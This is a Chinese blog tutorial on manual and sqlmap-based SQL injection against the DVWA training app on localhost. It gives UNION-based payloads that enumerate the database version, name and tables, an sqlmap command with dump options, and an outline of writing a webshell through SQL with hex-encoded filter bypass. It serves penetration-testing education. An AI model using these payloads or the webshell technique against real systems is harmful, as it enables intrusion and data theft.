【渗透测试-web安全】DVWA-SQL注入

最新推荐文章于 2022-09-18 13:27:48 发布
最新推荐文章于 2022-09-18 13:27:48 发布
阅读量787 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 网络安全 文章标签: DVWA SQL注入 网络安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/harry_c/article/details/103429123
本文深入探讨了在DVWA平台上进行SQL注入攻击的步骤与技巧,包括登录系统、内容分析、实操演示及内容进阶。通过构造SQL语句,实现了数据查询、插入恶意代码,并介绍了SQLmap工具的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

【渗透测试-web安全】DVWA-SQL注入

一、登录系统

登录到系统设置好对应的安全级别,我们点击SQL打开,任意输入一个ID序号反馈一下内容:

在这里插入图片描述

二、内容分析

我们对内容进行分析可以知道我们输入userID之后系统会自动入库查找对应的用户并反馈用户的数据到前端
我们可以猜测系统可能使用的SQL语句:
	SSELECT * FROM user WHERE user_id='$id'
因此我们构建注入的POC方法:

		可能的SQL语句	注入实例
		SELECT username FROM user WHERE user_id = $id	SELECT username FROM user WHERE user_id = 1 or 1=1 
		SELECT username FROM user WHERE user_id = '$id'	SELECT username FROM user WHERE user_id = 1 'or' 1 '=' 1 
		SELECT username FROM user WHERE user_id = "$id"	SELECT username FROM user WHERE user_id = 1 "or" 1 "=" 1

三、实操

我们分别使用构造的SQL语句进行测试 当使用1 ‘or’ 1 ‘=’ 1时出现注入:
在这里插入图片描述
从而我们确定了系统的SQL可能形式:SELECT username FROM user WHERE user_id = ‘$id’
MYsql常见的注释语句:
#:单行注释
–空格:后面的内容直接忽略
/**/:注释中间的内容
我们有时候能够利用Mysql的注释语句将系统原始的SQL语句进行重构或者意义切换,从而构建出符合我们需求的SQL语句
结合上面的内容我们构造一个查询数据库名称的SQL注入语句:
1’ union select @@version ,@@datadir–:显示数据库的数据路径
在这里插入图片描述
1’ union SELECT user(), database()-- :查询数据库名称
在这里插入图片描述
1’ union SELECT 1, table_name from information_schema.tables where table_schema=‘dvwa’-- :查询表名
在这里插入图片描述
我们通过构建SQL语句查询任何我们想要查询的数据内容,或者插入数据库我们任何想插入的数据。
我们可以通过对数据库插入一句话木马等信息能够执行对应的脚本
构建的基本思路是首先利用各种报错,获取系统的绝对路径
然后利用SQL语句写入一句话木马到对应的文件中,通过访问对应的文件就能够执行一句话木马
注意当某些字符串被转义的时候我们是可以使用HAX编码进行绕过 如dvwa用0x64767761代替
SQLmap扫描使用:
原始网址为:http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#
SQLmap使用语句:python2 sqlmap.py -u “http://localhost/dvwa/vulnerabilities/sqli/” --data “id=1&Submit=Submit” -p “id” --cookie “security=medium; Pycharm-e029d31e=f06790ed-69d6-4ec0-a540-cc9a5281ce7f; PHPSESSID=aafsqsrvc2639i7b1tu2h622vd”
其中 -u指网址 --data 指传入的参数 -p 指检测SQL注入点 --cookie 指登录的cookie
在这里插入图片描述

四、内容进阶

当注入的点和返回的点不在同一个页面时我们可以使用–second-order参数指定对应的返回url

-D 指定数据库 -T指定表名 -C指定列表 --dump参数指将数据导出

–current-db 显示当前数据库 -v 输出详细信息有少到多1-6 --level 表示等级

SQL盲注:
	基本概念:数据库中的执行结果不会反馈回显到页面上,页面上之后显示真和假两种状态。
	基本实现:通过布尔型数据使用SQL语句拆解返回真假类型,然后使用二分法判断正确内容。通过延时型,执行某些延时的函数进行前台判断是否已经被执行,从而能够判断某些函数是否已经成功执行,同时也能通过if语句确定某些内容的真假。
渗透测试实验_使用DVWA进行SQL手动注入 SQL手动注入的基本步骤 安全等级Low Medium High
weixin_47133613的博客
03-18 6525
文章目录SQL手动注入1. 前期数据准备2. 前期实验准备3. SQL手动注入的预备知识4. SQL手动注入的基本步骤5. 实现SQL注入6. Low等级7. Medium等级8. High等级9. Impossible等级 SQL手动注入 1. 前期数据准备 查看DVWA数据库的信息 第一步:打开Windows2003虚拟机后,启动phpStudy 第二步:进入MySQL 第三步:查看数据库 查看库名 选择数据库“dvwa”后,查看其中的表名 查看“dvwa“库中users
DVWA渗透环境下SQL注入
skyattractive的博客
07-29 541
DVWA渗透环境下SQL注入 dvwa是一个randomstorm的开源项目,用来供给新手学习渗透测试的一个环境,里面共有十个模块: Brute Force(暴力(破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码) SQL Injection(SQL注入SQL Injection(Blind)(SQL盲注) XSS(Reflected
html sql注入_渗透测试新手入门之DVWASQL注入)篇
weixin_39984982的博客
11-16 264
一、SQL注入概念SQL注入是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。二、手工注入常规思路1.判断是否存在注入注入是字符型还是数字型2.猜解SQL查询语句中的字段数3.确定回显位置4.获取当前数据库5.获取数据库中的表6.获取表中的字段名7.得到数据将DVWA的级别设置为low1.分析源码,可以看到没有对参数做任何的过滤,直接带入数据库进行查...
Kali渗透测试(九)——DVWA SQL 注入
Bulldozer_GD的博客
07-16 706
Kali渗透测试(九)——DVWASQL注入 一. 低级别,没有对用户输入做任何限制,提及的数据直接拼接。 1. 查询所有数据库 2. 查询dvwa库中的表名 查询字段名 4. 查询用户名密码 5.也可以进行操作系统级别的命令执行 6.无权读取information_schema ,拒绝 union/order by 时: 猜列名:利用burpsuite Intruder 和字典文件 ' and column is null--猜表名 ' and table.user is n
Web安全性测试—SQL注入
hualusiyu的专栏
03-10 4206
Web安全性测试—SQL注入 因为要对网站安全性进行测试,所以,学习了一些sql注入的知识。   在网上看一些sql注入的东东,于是想到了对网站的输入框进行一些测试,本来是想在输入框中输入alter("abc"),但是输入框有字符限制,只好输入,结果网站出大问题了,呵呵,终于又出现了个bug。   另一个就是在URL最后随意输入一些字符或数字,结果,新闻模块那出现了问题,暴露了网站的一些信息
渗透测试--DVWA命令注入
qq_45070118的博客
07-30 1983
DVWA 命令注入:利用各种调用系统命令的web应用,通过命令拼接、绕过黑名单等方式实现在服务端实现想要实现的系统命令。 如何配置登陆看我的burpsuite爆破文章中就有 这次我分为linux和windows两个版本登录时分别把登陆网址的IP改为目标系统的IP即可 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应...
渗透测试-靶场——dvwa && sqli-labs介绍部署
aming小老弟
07-18 40
#本文为广告系统自动投放广告 # 如有侵权 删改 请速速联系我们 #1 介绍 Web应用程序(DVWA)是一个很容易受到攻击的PHP / MySQL Web应用程序。其主要目标是帮助安全专业人员在法律环境中测试他们的技能和工具,是一个web安全学习神器。 SQLi-Labs是一个专业的SQL注入练习平台,适用于GET...
适合DVWASQL-li-lab的PHPStudy、DVWASQL-li-labs
03-26
接着是DVWA,这个应用设计有多个安全漏洞,包括跨站脚本(XSS)、文件包含漏洞、SQL注入等,用于模拟真实世界的网络安全问题。通过DVWA,开发者或安全研究人员可以实践如何发现这些漏洞,并学习如何修复它们。每个...
渗透测试环境部署DVWA
最新发布
10-29
DVWA(Damn Vulnerable Web Application)是一款专门为渗透测试安全教育设计的开源Web应用程序。在这个环境中,我们可以模拟各种常见Web漏洞,如SQL注入、跨站脚本(XSS)、文件包含、命令注入等,以学习如何检测...
web安全测试--sql注入攻击
weixin_30689307的博客
12-19 292
先要自行了解sql的几个概念: 1.or'1'='1' 2.orderby 3.union:联合查询需要表字段相同 sql注入攻击漏洞判断步骤: 1、‘ 2、查看数据库信息 3、绕过过滤/**/ 如:url编码绕过or1=1即%6f%72%20%31%3d%31(%3d为=,%31为1,%6f%72为or) ...
web安全性测试 sql注入一日通
03-30
sql注入一日通sql注入一日通sql注入一日通sql注入一日通sql注入一日通
web安全性测试sql注入高级篇
03-30
web安全性测试sql注入高级篇web安全性测试sql注入高级篇web安全性测试sql注入高级篇
web安全性测试之sql注入进阶篇
03-30
web安全性测试之sql注入进阶篇web安全性测试之sql注入进阶篇
安全渗透学习-DVWASQL注入
重启专家的博客
08-27 620
low: 手动注入: 判断注入点: 输入1,查询成功 输入1'进行查询,返回查询错误,判断对‘ 未进行过滤处理 输入1 and 1=1查询 输入1' or '1'='1, 遍历出了数据库中所有内容。 使用order by 来判断查询表的字段数 2 成功,3不成功 通过内置函数来获取关键信息 即是让内置查询函数代替当前的显示位。 version()  user()  database()  1' union select version(),...
SQL注入分类、防御
BeatRex的博客
06-13 3355
一、SQL注入分类 按数据类型分 数字类型 后台语句可能为: $id=$_POST['id'] select user,password from users where id=$id 字符类型 $id=$_POST['id'] 后台语句可能为:select user,password from users where id='$id' 总结: 数字类型直接将后台接收到用户输入的内容带入到数...
WEB安全基础 - - -SQL注入
weixin_67503304的博客
07-06 1407
依据web安全分析sql注入的基本知识点,方便以后sql注入的利用。
安全测试(sql注入、xss、csrf)
chensi16114的博客
06-19 2511
浅谈Php安全和防Sql注入,防止Xss攻击,防盗链,防CSRF前言:首先,笔者不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记、细心总结文章,里面有些是我们phper不易发现或者说不重视的东西。所以笔者写下来方便以后查阅。在大公司肯定有专门的web安全测试员,安全方面不是phper考虑的范围。但是作为一个phper对于安全知识是:“知道有这么一回事,编程时自然有所注意”。目...
web渗透之sql注入-学习笔记分享
weixin_52112965的博客
09-18 424
web渗透之sql注入-学习笔记分享
SQL注入DVWA演示)
qq_45070118的博客
08-05 1956
SQL:结构化查询语言 SQL注入 所谓SQL注入式攻击,就是攻击者把SQL命令插入到Web表单的输入域或页面请求的查询字符串,欺骗服务器执行恶意的SQL命令。 实验代码: 1’and’ 1’=‘2 1’ or ‘1’ =‘1 1’ or ‘1234’=‘1234 1’ or 1=1 order by 1 # 1’ or 1=1 order by 2 # 1’ union select 1,2# ...
初学者的dvwa渗透测试SQL注入指南
综上所述,DVWA测试环境为网络安全的初学者提供了一个宝贵的工具,让他们可以在安全的环境下学习和实践各种网络安全技术和策略,尤其是SQL注入渗透测试。这是一个学习网络安全不可或缺的资源,可以帮助用户打下...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值